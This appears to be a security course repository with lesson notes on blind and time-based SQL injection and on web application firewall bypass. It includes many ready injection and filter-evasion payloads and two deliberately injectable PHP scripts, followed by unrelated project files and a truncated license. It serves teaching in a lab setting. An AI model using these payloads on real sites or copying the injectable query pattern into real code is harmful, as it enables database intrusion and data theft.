Blind SQL Injection

2 | 3 | # Boolean Based SQL Injection 4 | 5 | - Blind SQL (Structured Query Language) injection is a type of SQL Injection attack that asks the database true or false questions and determines the answer based on the application's response 6 | 7 | 8 | # SQL functions you need to know 9 | 10 | 11 | ## `length()` 12 | 13 | - Returns the length of the string, in bytes 14 | 15 | #### Syntax 16 | 17 | `LENGTH(string)` 18 | 19 | - eg. `SELECT LENGTH("SQL Tutorial");` 20 | - eg. `SELECT LENGTH(database());` 21 | 22 | 23 | 24 | ## `substring()` 25 | 26 | - The `SUBSTRING()` function extracts a substring from a string (starting at any position). 27 | 28 | #### Syntax 29 | 30 | `SUBSTRING(string, start, length)` 31 | 32 | - eg. `SUBSTRING("sqltest",2,3)` 33 | - eg. `SUBSTRING(database(),1,1)` 34 | 35 | 36 | 37 | 38 | ## `ascii()` 39 | 40 | - The ASCII() function returns the ASCII value of the specified character 41 | 42 | #### Syntax 43 | 44 | `ASCII(character)` 45 | 46 | ## `CHAR()` 47 | 48 | - `CHAR()` returns the character value of the given integer value according to the ASCII table 49 | 50 | #### Syntax 51 | 52 | `CHAR(ASCII number)` 53 | 54 | 55 | ## `IF()` 56 | 57 | - The IF() function returns a value if a condition is TRUE, or another value if a condition is FALSE 58 | 59 | #### Syntax 60 | 61 | `IF(condition, value_if_true, value_if_false)` 62 | 63 | - eg. ` IF(500<1000, "YES", "NO")` 64 | 65 | 66 | 67 | 68 | 69 |
70 | 71 | 72 |

Practical Lab (Boolean-Based) Training

73 | 74 | 75 | `In this session, We used SQLi Lab Lesson-8` 76 | 77 | ## 1. Finding the parameter to inject 78 | 79 | `http://localhost:8000/chapter1/sqli_lab/Less-8/?id=2` 80 | 81 | - Background Query 82 | 83 | - `SELECT * FROM table_name WHERE id='2'` 84 | 85 | ## 2. Identify the vulnerability 86 | 87 | - 1. Test with a quote `'` or `"` 88 | - 2. Fix the error with `-- -` or `--+` 89 | - 3. Test with a condition 90 | 91 | - TRUE Condition ==> `AND 1=1` or `AND '1'='1` 92 | - FALSE Condition ==> `AND 1=2` or `AND '1'='2` 93 | 94 | ## 3. Enumerate Data 95 | 96 | ### 1. Finding the Length of the Database name 97 | 98 | - Use the `<` and `=` operators to find the length of the Database name 99 | - `AND (LENGTH(database())) < 10` 100 | - `AND (LENGTH(database())) = 8` 101 | 102 | ### 2. Finding the Database name using the `ascii()` and `substring()` Functions 103 | 104 | 105 | - `AND (ascii(substring(database(),1,1))) < 100` 106 | 107 | ### 3. Finding the Table name 108 | 109 | #### Step by step payload creation 110 | 111 | - `AND (ascii(substring()))` 112 | 113 | - `(select table_name from information_schema.tables where table_schema= database() limit 0,1); 114 | ` 115 | 116 | #### Final payload (I already know the users table is the fourth table, so I use `limit 3,1`) 117 | 118 | - `AND (ascii(substring((select table_name from information_schema.tables where table_schema= database() limit 3,1), 1,1 ))) < 100` 119 | 120 | ### 4. Finding the Column name 121 | 122 | 123 | `AND (ascii(substring((select column_name from information_schema.columns where table_name = 'users' and table_schema= database() limit 1,1), 1,1 ))) < 100` 124 | 125 | 126 | 127 |

Time-Based Injection

128 | 129 | 130 | ## Mostly same as Boolean Based Injection and used SQLI lab `lesson 10` 131 | 132 | 133 | ## Identify the vulnerability 134 | 135 | `' and sleep(10)--+` 136 | 137 | `" and sleep(10)--+` 138 | 139 | ## Payload 140 | 141 | `" and if(100<200,sleep(10),Null)--+` 142 | 143 | `" and if(ascii(substring(database(),1,1)) = 115,sleep(10),Null)--+` 144 | 145 | 146 | 147 | 148 | -------------------------------------------------------------------------------- /lesson_notes/w-6.0_sql_injection/mysql_errorBased.php: -------------------------------------------------------------------------------- 1 | connect_error) { 21 | die("Connection failed: " . $conn->connect_error); 22 | } 23 | 24 | 25 | $uid = $_GET['id']; 26 | $sql = "SELECT * FROM users WHERE id=$uid"; # 3rwrgdsnsgjn 27 | $result = $conn->query($sql); 28 | 29 | if ($result->num_rows > 0) { 30 | // output data of each row 31 | while($row = $result->fetch_assoc()) { 32 | //echo "Greeting : ", $row['status']; 33 | //echo "
"; 34 | //echo "Department : ", $row['work']; 35 | //echo "
"; 36 | echo "1 result"; 37 | } 38 | } else { 39 | echo "0 results"; 40 | } 41 | $conn->close(); 42 | 43 | ?> 44 | -------------------------------------------------------------------------------- /lesson_notes/w-6.0_sql_injection/mysqli.php: -------------------------------------------------------------------------------- 1 | connect_error) { 21 | die("Connection failed: " . $conn->connect_error); 22 | } 23 | 24 | 25 | $uid = $_GET['id']; 26 | $sql = "SELECT * FROM users WHERE id='$uid'"; 27 | $result = $conn->query($sql); 28 | 29 | if ($result->num_rows > 0) { 30 | // output data of each row 31 | while($row = $result->fetch_assoc()) { 32 | echo "Greeting : ", $row['status']; 33 | echo "
"; 34 | echo "Department : ", $row['work']; 35 | echo "
"; 36 | } 37 | } else { 38 | echo "0 results"; 39 | } 40 | $conn->close(); 41 | 42 | ?> -------------------------------------------------------------------------------- /lesson_notes/w-7.0_waf_bypass/7.1_Basic_waf_function.md: -------------------------------------------------------------------------------- 1 |

Waf Bypass Theory

2 | 3 | # Introduction to Web Application Firewall 4 | 5 | ![WAF](../photo/waf.png) 6 | 7 | [Photo Credit](https://www.section.io/engineering-education/web-application-firewall-bot-mitigation-comparison/) 8 | 9 | 10 | ## Web Application Firewall 11 | 12 | - A firewall that sits in front of a web application to `filter`, `analyze` and `block` all the HTTP traffic that passes through it and tries to communicate with the web server 13 | 14 | - WAFs are also called `reverse proxies` 15 | - `a proxy protects the client, a reverse proxy protects the server` 16 | 17 | ## Two security models of WAF 18 | 19 | 1. Positive (White List) 20 | - Allow only traffic that is explicitly allowed by the WAF and block all other traffic 21 | 2. Negative (Black List) 22 | - Allow all traffic to pass and only block the traffic matched by the black list 23 | 24 | 25 | ## WAF Filter Rules 26 | 27 | - WAFs have some `preset rules` 28 | - If a request matches one of the preset rules, the request is blocked because it is flagged as malicious. 29 | - In most of the enterprise WAF solutions these rules are hidden, and no one can access or see them. This is because developers believe that if these rules are hidden, users won’t know them and 30 | neither will attackers, so it protects users from easy bypass techniques 31 | 32 | 33 | # WAF Fingerprinting 34 | 35 | - 1. Passive Fingerprinting 36 | - 2. Active Fingerprinting 37 | 38 | 39 | ## 1. Passive Fingerprinting 40 | 41 | - Find signs of a WAF in the `HTTP` response of the web server 42 | - eg. a cookie in the response header containing (`ns_af=cookie_value`) is the sign of a Citrix Netscaler 43 | 44 | ## 2. Active Fingerprinting 45 | 46 | - send two different URIs (`/filepath`); if one successfully returns the requested material and the other does not ==> a WAF is present. 
47 | 48 | 49 | # WAF fingerprinting with nmap script 50 | 51 | `nmap -p80 --script http-waf-detect --script-args="http-waf-detect.aggro " ` 52 | 53 | - This script can detect numerous IDS, IPS, and WAF products since they often protect web applications in the same 54 | way. But it won’t detect products that don’t alter the HTTP traffic. Results can vary based on product configuration, 55 | but this script has been tested to work against various configurations of the following products 56 | 57 | `nmap --script=http-waf-fingerprint ` 58 | 59 | 60 | # WAF fingerprinting with `WAFW00F` 61 | - Python script that automates WAF fingerprinting and identifies Web Application Firewall (WAF) prod- 62 | ucts. 63 | 64 | `wafw00f google.com` 65 | 66 | 67 | # WAF Function 68 | 69 | ![How WAF work](../photo/waf_function.png) 70 | 71 | ## 1. Pre-Processor 72 | 73 | - Decides whether a request will be processed further 74 | 75 | - Filters every incoming request and decides whether the request will be processed further or stopped immediately. 76 | 77 | - Very suspicious requests are blocked at this stage 78 | 79 | ## 2. Normalization 80 | 81 | - Standardizes user input 82 | 83 | - Uses various functions 84 | 85 | - E.g. functions 86 | - `hexDecode()` = decodes a hex-encoded string 87 | - `lowercase()` = converts characters to lower case 88 | - `urlDecode()` = decodes a URL-encoded string 89 | 90 | ## 3. Input Validation 91 | 92 | - Checks user input against policies 93 | 94 | - Validates requests using regular expressions 95 | 96 | - Three security models 97 | 1. Positive security model 98 | 2. Negative Security Model 99 | 3. Hybrid Security Model 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | -------------------------------------------------------------------------------- /lesson_notes/w-7.0_waf_bypass/7.2_waf_bypass.md: -------------------------------------------------------------------------------- 1 |

WAF bypass Technique

2 | 3 | # Bypassing Methods and Techniques 4 | 5 | #### 1. Pre-processor exploitation 6 | - Make WAF skip input validation 7 | #### 2. Impedance Mismatch 8 | - WAF interpret input differently 9 | #### 3. Rule set Bypassing 10 | - Use Payload that are not detected by WAF 11 | 12 | 13 | 14 | # General step in WAF bypass 15 | 16 | 1. Fingerprint WAF and examine the filter rules 17 | 2. Encrypt the payload 18 | 3. Test payload and examine the response 19 | 4. If the payload cannot bypass WAF, use another payload and repeat from step 2 20 | 21 | 22 | 23 | 24 | 25 | 26 |

SQL injection WAF bypass

27 | 28 | 29 | # Normal Bypassing Technique 30 | 31 | 32 | ## Bypass with Comment 33 | 34 | - SQL comments allow to bypass a lot of filtering and WAF 35 | 36 | `http://victim.com/news.php?id=1+un/**/ion+se/**/lect+1,2,3--` 37 | 38 | 39 | 40 | ## Case Changing 41 | 42 | Some WAF filter only lowercase SQL keyword 43 | 44 | Regex Filter ==> ` /union\sselect/g` 45 | 46 | `http://victim.com/news.php?id=1+UnIoN/**/SeLecT/**/1,2,3--` 47 | 48 | 49 | 50 | ## Replaced Keyword 51 | 52 | - Some application and WAFs use preg_replace to remove all SQL keyword. So we can bypass 53 | 54 | `http://victim.com/news.php?id=1+UNunionION+SEselectLECT+1,2,3--` 55 | 56 | - Some case SQL keyword was filtered out and replaced with whitespace. So we can use `%0b` to 57 | bypass. 58 | 59 | `http://victim.com/news.php?id=1+uni%0bon+se%0blect+1,2,3--` 60 | 61 | 62 | 63 | ## Adding or Removing White Space 64 | 65 | - Adding or Removing space won't affect the SQL statement 66 | 67 | - We can bypass WAF by adding or removing white space 68 | 69 | #### Blocked Query 70 | `' or 1 = 1'` 71 | 72 | #### By pass statement 73 | `'or '1'='1'` 74 | 75 | 76 | 77 | ## Character Encoding 78 | 79 | - Many DBMS have different SQL syntax, most of them support Unicode, Base64, hex, octal, binary 80 | 81 | - Many `blacklisted characters` can be replaced by their functional alternatives 82 | 83 | 84 | - Most CMSs and WAFs will decode and filter/bypass an application input, but some WAFs only `decode the input once` so `double encoding` can bypass certain filters as the WAF will decode the input once then filter while application keep decoding the SQL statement executing 85 | 86 | #### Normal Query 87 | 88 | `' UNION SELECT table_schema, table_name FROM information_Schema.tables where table_schema = "dvwa" -- -` 89 | 90 | #### Bypass Query 91 | 92 | ``' UNION SELECT table_schema, table_name FROM information_Schema.tables where table_schema = char(100,118,119,97) -- -`` 93 | 94 | - we replaced the “dvwa” with 
char(100,118,119,97) which is the MySQL char() function 95 | that uses ASCII codes inside and we use it to inject into MySQL without using double quotes that many times gets filtered by WAFs. Char() also works on almost all other databases but sometimes it can only hold one character at a time, like for example char(0x##)+char(0x##)+...So if the one way does not work for us, we have to try another. 96 | 97 | 98 | 99 | ## Keyword Replacing 100 | 101 | - Many times keywords themselves are blocked from the WAF. An encode way to bypass this filter is by replacing the keywords we use with others, so once the WAF strips the keyword, our desired keyword will remain 102 | 103 | `' union selselectect password from mySQL.user limit 1 /*` 104 | 105 | - WAF is blocking the select keyword. 106 | - Once the query passes and gets filtered, the middle select keyword 107 | - `sel` from the start and `ect` from the end will get merged and form a new select keyword that will get executed in the server. 108 | 109 | ## string Concatenation 110 | 111 | - Break up SQL keyword and bypass WAF filter rules 112 | - Concatenation syntax varies based on the database. 113 | 114 | `EXEC ('SEL' + 'ECT 1'` 115 | 116 | 117 | 118 | ## Buffer Overflow 119 | 120 | -WAFs that written in the C language prone to overflow or act differently when loaded with a bunch of 121 | data. Give a large amount of data allows our code executing 122 | 123 | ``` 124 | http://victim.com/news.php?id=1+and+(select 1)=(select 125 | 0x414141414141441414141414114141414141414141414141414141414141414141+union+select+1,2,version(),database(),user(),6,7,8,9,10-- 126 | 127 | ``` 128 | 129 | ## Inline Comments (MySQL Only) 130 | 131 | 132 | - MySQL Server supports some variants of C-style comments. 133 | These enable you to write code that includes MySQL extensions, but is still portable, by using 134 | comments of the following form: 135 | 136 | `/*! 
MySQL-specific code */` 137 | 138 | - A lot of WAFs filter SQL keywords like /union\sselect\ig We can bypass this filter by using inline 139 | comments. 140 | 141 | `http://victim.com/news.php?id=1/*!UnIoN*/SeLecT+1,2,3--` 142 | 143 | - Inline comments can be used throughout the SQL statement so if table_name or information_schema 144 | are filtered we can add more inline comments 145 | 146 | `http://victim.com/news.php?id=/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/) 147 | +FrOm/*!information_schema*/.tables/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--` 148 | 149 | 150 | -------------------------------------------------------------------------------- /lesson_notes/w-7.0_waf_bypass/7.3_advnace_waf_bypass.md: -------------------------------------------------------------------------------- 1 | # Advanced WAF Bypass 2 | 3 | 4 | 5 | # WAF Filter Rules Bypass 6 | 7 | 8 | ## Example 9 | 10 | - If we are testing the `http://web.com?id=1`, then WAF filter rule is like: 11 | 12 | `/?id=1+union+(select+*+from+password)` 13 | 14 | - This request is easily blocked by WAF and we can bypass: 15 | 16 | `/?id=(1)union(select(1),mid(hash,1,32)from(password))` 17 | `?/?id=1+union+(select'1',concat(login,hash)from+passwords)` 18 | 19 | 20 | - Many WAF filter only one layer of brackets, so we can bypass using additional layer of brackets 21 | 22 | `/?id=(1)union(((((((select(*),hex(hash)from(passwords))))))))` 23 | 24 | 25 | ## PHPIDS (PHP Intrusion Detection System) WAF 26 | 27 | - PHPIDS has sone default filter rules that you can find in its GitHub Page 28 | 29 | #### WAF RULE 30 | 31 | `/?id=1+OR+1=1` 32 | 33 | #### By pass 34 | 35 | `?id=1+OR+0x50=0x50` 36 | 37 | 38 | 39 | 40 | 41 | # HTTP parameter Pollution (HPP) 42 | 43 | - sending a number of parameter with the same name 44 | 45 | - Technology interpret this request differently 46 | 47 | 48 | 49 | #### Normal Payload 50 | 51 | `http://www.website.com/products/?productid=1` 52 | 53 | #### Bypass Payload 54 | 55 | 56 | 
`http://www.website.com/products/?productid=1&productid=2` 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 |
Backend Behavior Process
ASP.NET Concat with comma productid=1,2
JSP First Para productid=1
PHP Last Para productid=2
82 | 83 | 84 | 85 | 86 | ## HPP Exploitation with SQL 87 | 88 | #### SQL injection code 89 | 90 | `http://website.com/?id=”queryquery1”&id=”queryquery2` 91 | 92 | #### Backend Query 93 | 94 | `select key from table where id="+Request.QueryString("id")` 95 | 96 | #### WAF bypass 97 | 98 | `/?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users` 99 | 100 | - The WAF keeps only the last `id` parameter and drops the others (because of HPP) 101 | - `/**/` is an SQL comment 102 | - So only the SQL query is left in the end and executed 103 | 104 | #### Final Query in the end 105 | 106 | `select key from table where 107 | id=1/**/union/**/select/**/pwd/**/from/*,*/users` 108 | 109 | 110 | 111 | # HTTP Parameter Fragmentation (HPF) 112 | 113 | #### Vulnerable code 114 | 115 | `Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']); 116 | Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']." limit".$_GET['c']);` 117 | 118 | (The root cause here is string-built SQL; prepared statements with bound parameters close the HPF vector regardless of WAF rules.) 119 | #### WAF RULE 120 | 121 | `/?a=1+union+select+1,2/*` 122 | 123 | 124 | #### Bypass using HPF 125 | 126 | `?a=1+union/*&b=*/select+1,2` 127 | 128 | `/?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--` 129 | 130 | #### SQL Query in the end 131 | 132 | `select * from table where a=1 union/* and b=*/select 1,2` 133 | 134 | `select * from table where a=1 union/* and b=*/select 1,pass/* limit */from users--` -------------------------------------------------------------------------------- /lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/CODE_OF_CONDUCT.md: -------------------------------------------------------------------------------- 1 | # Contributor Covenant Code of Conduct 2 | 3 | ## Our Pledge 4 | 5 | In the interest of fostering an open and welcoming environment, we as 6 | contributors and maintainers pledge to making participation in our project and 7 | our community a harassment-free experience for everyone, regardless of age, body 8 | size, disability, ethnicity, sex characteristics, gender identity and
expression, 9 | level of experience, education, socio-economic status, nationality, personal 10 | appearance, race, religion, or sexual identity and orientation. 11 | 12 | ## Our Standards 13 | 14 | Examples of behavior that contributes to creating a positive environment 15 | include: 16 | 17 | * Using welcoming and inclusive language 18 | * Being respectful of differing viewpoints and experiences 19 | * Gracefully accepting constructive criticism 20 | * Focusing on what is best for the community 21 | * Showing empathy towards other community members 22 | 23 | Examples of unacceptable behavior by participants include: 24 | 25 | * The use of sexualized language or imagery and unwelcome sexual attention or 26 | advances 27 | * Trolling, insulting/derogatory comments, and personal or political attacks 28 | * Public or private harassment 29 | * Publishing others' private information, such as a physical or electronic 30 | address, without explicit permission 31 | * Other conduct which could reasonably be considered inappropriate in a 32 | professional setting 33 | 34 | ## Our Responsibilities 35 | 36 | Project maintainers are responsible for clarifying the standards of acceptable 37 | behavior and are expected to take appropriate and fair corrective action in 38 | response to any instances of unacceptable behavior. 39 | 40 | Project maintainers have the right and responsibility to remove, edit, or 41 | reject comments, commits, code, wiki edits, issues, and other contributions 42 | that are not aligned to this Code of Conduct, or to ban temporarily or 43 | permanently any contributor for other behaviors that they deem inappropriate, 44 | threatening, offensive, or harmful. 45 | 46 | ## Scope 47 | 48 | This Code of Conduct applies both within project spaces and in public spaces 49 | when an individual is representing the project or its community. 
Examples of 50 | representing a project or community include using an official project e-mail 51 | address, posting via an official social media account, or acting as an appointed 52 | representative at an online or offline event. Representation of a project may be 53 | further defined and clarified by project maintainers. 54 | 55 | ## Enforcement 56 | 57 | Instances of abusive, harassing, or otherwise unacceptable behavior may be 58 | reported by contacting the project team at theinfecteddrake@gmail.com. All 59 | complaints will be reviewed and investigated and will result in a response that 60 | is deemed necessary and appropriate to the circumstances. The project team is 61 | obligated to maintain confidentiality with regard to the reporter of an incident. 62 | Further details of specific enforcement policies may be posted separately. 63 | 64 | Project maintainers who do not follow or enforce the Code of Conduct in good 65 | faith may face temporary or permanent repercussions as determined by other 66 | members of the project's leadership. 67 | 68 | ## Attribution 69 | 70 | This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4, 71 | available at https://www.contributor-covenant.org/version/1/4/code-of-conduct.html 72 | 73 | [homepage]: https://www.contributor-covenant.org 74 | 75 | For answers to common questions about this code of conduct, see 76 | https://www.contributor-covenant.org/faq 77 | -------------------------------------------------------------------------------- /lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | I appreciate and recognize [all contributors](https://github.com/0xInfection/awesome-waf/graphs/contributors). 2 | 3 | > First of all thank you for even considering of contributing to this awesome list. __"The community just learns from each other"__. 
4 | 5 | ## Table of Contents 6 | 7 | - [Contribution guidelines](#contribution-guidelines) 8 | - [Quality Standard](#quality-standard) 9 | - [Adding to this list](#adding-to-this-list) 10 | - [Adding something to an awesome list](#adding-something-to-an-awesome-list) 11 | - [Updating your Pull Request](#updating-your-pull-request) 12 | 13 | ## Contribution Guidelines 14 | 15 | __Your pull request/commit message will be a tweet, please keep that in mind.__ :) 16 | 17 | - **To add to the list:** Submit a pull request. 18 | - **To remove from the list:** Submit a pull request. 19 | - Want to change something: Submit a pull request. 20 | - Want to try something else: Submit a pull request. 21 | - Don't know what to do: Submit a pull request or open an issue, let me know what's going on. 22 | 23 | [Awesome-WAF](https://github.com/0xinfection/awesome-waf) is a hand-crafted list for high-quality information about web application firewalls and its resources. Following items are recommended to be kept in mind. 24 | 25 | - If you are submitting a new fingerprint, include the headers/page source, etc. 26 | - Do not include the URL as it may expose the integrity of the site. 27 | > I will contact you personally if necessary via email. 28 | - Item you're adding should not be duplicate, no redirection (be careful with `http` vs `https`!). 29 | - The link should be the name of the slide or project or website. 30 | - Description should be clear and concise (read it out loud to be sure). 31 | - Description should follow the link, on the same line. 32 | - if you want to add more than one link, please don't do all PR on the exact same line, it usually results in conflicts and your PR cannot be automatically merged. 33 | 34 | Please contribute links to slides/tools you have used or are familiar with. This will help ensure high-quality entries. 35 | 36 | ## Quality Standard 37 | 38 | Note that we can help you achieve those standards, just try your best, be brave. 
39 | We'll guide you to the best of our abilities. 40 | 41 | To be on the list, it would be *nice* if entries adhere to these quality standards: 42 | 43 | - Generally useful to the community. 44 | - Clearly stating "what is it for": mention the problem it solves. Just try your best, make it clear for the next person. 45 | - Solves a real problem (even a small one) 46 | - If your PR is a **WIP** (work in progress, not safe for production), mention it. 47 | 48 | If your PR is not merged, I will tell you why so that you may be able to improve it. 49 | 50 | ## Contribution Guidelines 51 | 52 | ### Adding to this List 53 | 54 | Please ensure your pull request adheres to the following guidelines: 55 | 56 | - Search previous suggestions before making a new one, as yours may be a duplicate. 57 | - Make sure the list is useful before submitting. That implies it has enough content and every item has a good succinct description. 58 | - Make an individual pull request for each suggestion. 59 | - Use [title-casing](http://titlecapitalization.com) (AP style). 60 | - Use the following format: `[List Name](link)` 61 | - Link additions should be added to the bottom of the relevant category. 62 | - New categories or improvements to the existing categorization are welcome. 63 | - Check your spelling and grammar. 64 | - Make sure your text editor is set to remove trailing whitespace. 65 | - The pull request and commit should have a useful title. 66 | - The body of your commit message should contain a link to the repository. 67 | 68 | Thank you for your contributions! 69 | 70 | ### Adding something to an Awesome List 71 | 72 | If you have something awesome to contribute to an awesome list, this is how you do it. 73 | 74 | You'll need a [GitHub account](https://github.com/join)! 75 | 76 | 1. Access the awesome list's GitHub page. For example: https://github.com/sindresorhus/awesome 77 | 2. 
Click on the `readme.md` file: 78 | 79 | ![Step 2 Click on Readme.md](https://cloud.githubusercontent.com/assets/170270/9402920/53a7e3ea-480c-11e5-9d81-aecf64be55eb.png) 80 | 81 | 3. Now click on the edit icon. 82 | 83 | ![Step 3 - Click on Edit](https://cloud.githubusercontent.com/assets/170270/9402927/6506af22-480c-11e5-8c18-7ea823530099.png) 84 | 85 | 4. You can start editing the text of the file in the in-browser editor. Make sure you follow guidelines above. You can use [GitHub Flavored Markdown](https://help.github.com/articles/github-flavored-markdown/). 86 | 87 | ![Step 4 - Edit the file](https://cloud.githubusercontent.com/assets/170270/9402932/7301c3a0-480c-11e5-81f5-7e343b71674f.png) 88 | 89 | 5. Say why you're proposing the changes, and then click on "Propose file change". 90 | 91 | ![Step 5 - Propose Changes](https://cloud.githubusercontent.com/assets/170270/9402937/7dd0652a-480c-11e5-9138-bd14244593d5.png) 92 | 93 | 6. Submit the [pull request](https://help.github.com/articles/using-pull-requests/)! 94 | 95 | ### Updating your Pull Request 96 | 97 | Sometimes, a maintainer of an awesome list will ask you to edit your Pull Request before it is included. This is normally due to spelling errors or because your PR didn't match the awesome-* list guidelines. 98 | 99 | [Here](https://github.com/RichardLitt/knowledge/blob/master/github/amending-a-commit-guide.md) is a write up on how to change a Pull Request, and the different ways you can do that. -------------------------------------------------------------------------------- /lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 
8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. 
For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. 
Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. 
You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 
122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. 
